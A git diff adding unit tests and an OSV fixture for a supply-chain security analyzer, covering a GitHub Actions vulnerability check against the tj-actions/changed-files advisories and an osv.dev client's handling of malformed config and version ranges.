b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json new file mode 100644 index 000000000..76cdbf292 --- /dev/null +++ b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json @@ -0,0 +1,19 @@ +{ + "results": [ + {}, + {}, + { + "vulns": [ + { + "id": "GHSA-mcph-m25j-8j63", + "modified": "2024-01-02T16:41:27Z" + }, + { + "id": "GHSA-mrrh-fwg8-r2c3", + "modified": "2025-03-24T14:23:37Z" + } + ] + }, + {} + ] +} diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index c6ecb044d..39bf067ca 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -72,9 +72,11 @@ def test_detect_malicious_metadata( [deps_dev] url_netloc = {base_url_parsed.netloc} url_scheme = {base_url_parsed.scheme} - """ - check.osv_query_url = f"{base_url_parsed.scheme}://{base_url_parsed.netloc}" + [osv_dev] + url_netloc = {base_url_parsed.netloc} + url_scheme = {base_url_parsed.scheme} + """ user_config_path = os.path.join(tmp_path, "config.ini") with open(user_config_path, "w", encoding="utf-8") as user_config_file: user_config_file.write(user_config_input) diff --git a/tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py b/tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py new file mode 100644 index 000000000..2336ee89c --- /dev/null +++ b/tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py @@ -0,0 +1,105 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This module contains tests for the GitHub Actions vulnerabilities check.""" + +import json +import os +import urllib +from pathlib import Path + +import pytest +from pytest_httpserver import HTTPServer + +from macaron.code_analyzer.call_graph import BaseNode, CallGraph +from macaron.config.defaults import load_defaults +from macaron.slsa_analyzer.checks.check_result import CheckResultType +from macaron.slsa_analyzer.checks.github_actions_vulnerability_check import GitHubActionsVulnsCheck +from macaron.slsa_analyzer.ci_service.base_ci_service import BaseCIService +from macaron.slsa_analyzer.ci_service.github_actions.analyzer import build_call_graph_from_path +from macaron.slsa_analyzer.provenance.intoto import InTotoV01Payload +from macaron.slsa_analyzer.specs.ci_spec import CIInfo +from macaron.slsa_analyzer.specs.inferred_provenance import InferredProvenance +from tests.conftest import MockAnalyzeContext + +RESOURCE_PATH = Path(__file__).parent.joinpath("resources") + + +def get_ci_info(ci_services: dict[str, BaseCIService], ci_name: str, workflow_path: str) -> CIInfo: + """Get CIInfo instance.""" + ci_info = CIInfo( + service=ci_services[ci_name], + callgraph=CallGraph(BaseNode(), ""), + provenance_assets=[], + release={}, + provenances=[], + build_info_results=InTotoV01Payload(statement=InferredProvenance().payload), + ) + match ci_name: + case "github_actions": + root_node: BaseNode = BaseNode() + workflow_node = build_call_graph_from_path(root_node, workflow_path=workflow_path, repo_path="") + root_node.add_callee(workflow_node) + ci_info["callgraph"] = CallGraph(root_node, "") + + return ci_info + + +@pytest.mark.parametrize( + ("ci_name", "expected"), + [ + ( + "github_actions", + CheckResultType.FAILED, + ), + ( + "jenkins", + CheckResultType.PASSED, + ), + ], +) +def test_github_actions_vulns( + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + ci_name: str, + ci_services: dict[str, BaseCIService], + expected: str, +) -> None: + """Test that the check handles repositories correctly.""" + check = GitHubActionsVulnsCheck() + + # Set up the context object. + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="") + # Set up responses of OSV API. + with open( + os.path.join(RESOURCE_PATH, "osv_files", "tj-actions_changed-files_query.json"), encoding="utf8" + ) as query: + query_json = json.load(query) + with open( + os.path.join(RESOURCE_PATH, "osv_files", "tj-actions_changed-files_querybatch.json"), encoding="utf8" + ) as querybatch: + query_batch_json = json.load(querybatch) + + gha_source_path = os.path.join(RESOURCE_PATH, "github", "workflow_files", "Bradford1040_mainsail_check_locale.yml") + + base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) + user_config_input = f""" + [osv_dev] + url_netloc = {base_url_parsed.netloc} + url_scheme = {base_url_parsed.scheme} + """ + user_config_path = os.path.join(tmp_path, "config.ini") + with open(user_config_path, "w", encoding="utf-8") as user_config_file: + user_config_file.write(user_config_input) + # We don't have to worry about modifying the ``defaults`` object causing test + # pollution here, since we reload the ``defaults`` object before every test with the + # ``setup_test`` fixture. + load_defaults(user_config_path) + + httpserver.expect_request("/v1/query").respond_with_json(query_json) + httpserver.expect_request("/v1/querybatch").respond_with_json(query_batch_json) + + ctx.dynamic_data["ci_services"] = [get_ci_info(ci_services, ci_name, gha_source_path)] + + assert check.run_check(ctx).result_type == expected diff --git a/tests/slsa_analyzer/package_registry/test_osv_dev.py b/tests/slsa_analyzer/package_registry/test_osv_dev.py new file mode 100644 index 000000000..ea7a86ced --- /dev/null +++ b/tests/slsa_analyzer/package_registry/test_osv_dev.py @@ -0,0 +1,220 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for the osv.dev service.""" + +import os +from pathlib import Path + +import pytest + +from macaron.config.defaults import load_defaults +from macaron.errors import APIAccessError +from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService + + +@pytest.mark.parametrize( + ("user_config_input"), + [ + pytest.param( + """ + [osv_dev] + url_netloc = + url_scheme = https + query_endpoint = v1/query + """, + id="Missing netloc", + ), + pytest.param( + """ + [osv_dev] + url_netloc = osv.dev + url_scheme = https + query_endpoint = + """, + id="Missing query endpoint", + ), + ], +) +def test_load_defaults_query_api(tmp_path: Path, user_config_input: str) -> None: + """Test the ``load_defaults`` method.""" + user_config_path = os.path.join(tmp_path, "config.ini") + + with open(user_config_path, "w", encoding="utf-8") as user_config_file: + user_config_file.write(user_config_input) + + # We don't have to worry about modifying the ``defaults`` object causing test + # pollution here, since we reload the ``defaults`` object before every test with the + # ``setup_test`` fixture. + load_defaults(user_config_path) + + with pytest.raises(APIAccessError): + OSVDevService.call_osv_query_api({}) + + +def test_is_affected_version_invalid_commit() -> None: + """Test if the function can handle invalid commits""" + with pytest.raises(APIAccessError): + OSVDevService.is_version_affected( + vuln={}, pkg_name="pkg", pkg_version="invalid_commit", ecosystem="GitHub Actions" + ) + + +def test_is_affected_version_invalid_response() -> None: + """Test if the function can handle empty OSV response.""" + with pytest.raises(APIAccessError): + OSVDevService.is_version_affected( + vuln={"vulns": []}, pkg_name="repo/workflow", pkg_version="1.0.0", ecosystem="GitHub Actions" + ) + + +@pytest.mark.parametrize( + ("vuln", "workflow"), + [ + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + } + ], + }, + "tj-actions/changed-files", + id="Test missing ranges", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [ + { + "type": "ECOSYSTEM", + } + ], + } + ], + }, + "tj-actions/changed-files", + id="Test missing events", + ), + ], +) +def test_is_affected_version_invalid_osv_vulns(vuln: dict, workflow: str) -> None: + """Test if the function can handle invalid OSV vulnerability data.""" + with pytest.raises(APIAccessError): + OSVDevService.is_version_affected( + vuln=vuln, pkg_name=workflow, pkg_version="45.0.0", ecosystem="GitHub Actions" + ) + + +@pytest.mark.parametrize( + ("vuln", "workflow", "version", "expected"), + [ + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "45.0.0", + True, + id="Test affected version", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "45.0.0", + True, + id="Test affected version missing introduced", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + {"introduced": "0"}, + ], + } + ], + } + ], + }, + "tj-actions/changed-files", + "45.0.0", + True, + id="Test affected version missing fix", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "47.0.0", + False, + id="Test unaffected version", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "1.0.0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "1.0.0", + True, + id="Test introduced version", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "46.0.1", + False, + id="Test fix version", + ), + ], +) +def test_is_affected_version_ranges(vuln: dict, workflow: str, version: str, expected: bool) -> None: + """Test if the function can handle corner cases.""" + assert ( + OSVDevService.is_version_affected(vuln=vuln, pkg_name=workflow, pkg_version=version, ecosystem="GitHub Actions") + == expected + )